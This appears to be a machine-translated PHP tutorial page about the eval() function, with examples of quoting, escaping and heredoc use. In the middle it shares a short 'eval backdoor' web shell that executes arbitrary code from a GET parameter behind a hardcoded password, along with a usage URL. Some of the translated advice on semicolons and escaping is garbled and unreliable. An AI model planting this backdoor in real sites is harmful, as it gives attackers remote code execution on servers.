Of Stack

Introduction to PHP eval functions

  • 2020-12-05 17:07:49
  • OfStack

Code: 


eval("echo'hello world';");

The above code is the same as the following code:

echo"hello world";

Output in the browser: hello world

The following points should be noted when using eval() :

1. The argument to the eval function must have a semicolon at the end of the string, followed by an additional semicolon (this is the php limit).

2. Pay attention to single quotes, double quotes and backslashes. If there is a variable in the argument and the variable has an assignment, the $1 symbol before the variable must have \ to escape. No assignment is required if there is no assignment.

Code: 


$a=100;
eval("echo$a;");

Because there is no assignment operation, you can escape $. Without \ as follows: 


$a=100;
eval("echo\$a;")

3. Note that the imperative string (including semicolons) must be enclosed in double or single quotation marks as needed. Otherwise, error.

An imperative string is a string that contains commands such as echo and print.

If the argument has only one variable, you may not use it. Such as: 


$func =<<<FUNC
function test(){ 
  echo "test eval function"; 
}
FUNC;
eval($func);
test();

Share an php eval backdoor program

The eval function must be supported
Method of use
http://url/test.php?pwd=admin & action=eval & a=phpinfo(); 


<?php
$passwd="admin";if($_GET['pwd']!=$passwd)exit;
if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']);}
?>

PHP eval() function introduction

Definition and usage

The eval() function evaluates the string as the PHP code.

The string must be a valid PHP code and must end with a semicolon.

If the return statement is not called in the code string, NULL is returned. If there is a parsing error in the code, the eval() function returns false.

grammar
eval(phpcode)

参数 描述
phpcode 必需。规定要计算的 PHP 代码。

Hints and comments
Comment: The return statement immediately terminates the evaluation of the string.
Note: This function is useful for storing code in a database text field for later computation.
example 


<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?>

Output:
This is a $string $time morning!
This is a beautiful winter morning!

Related articles: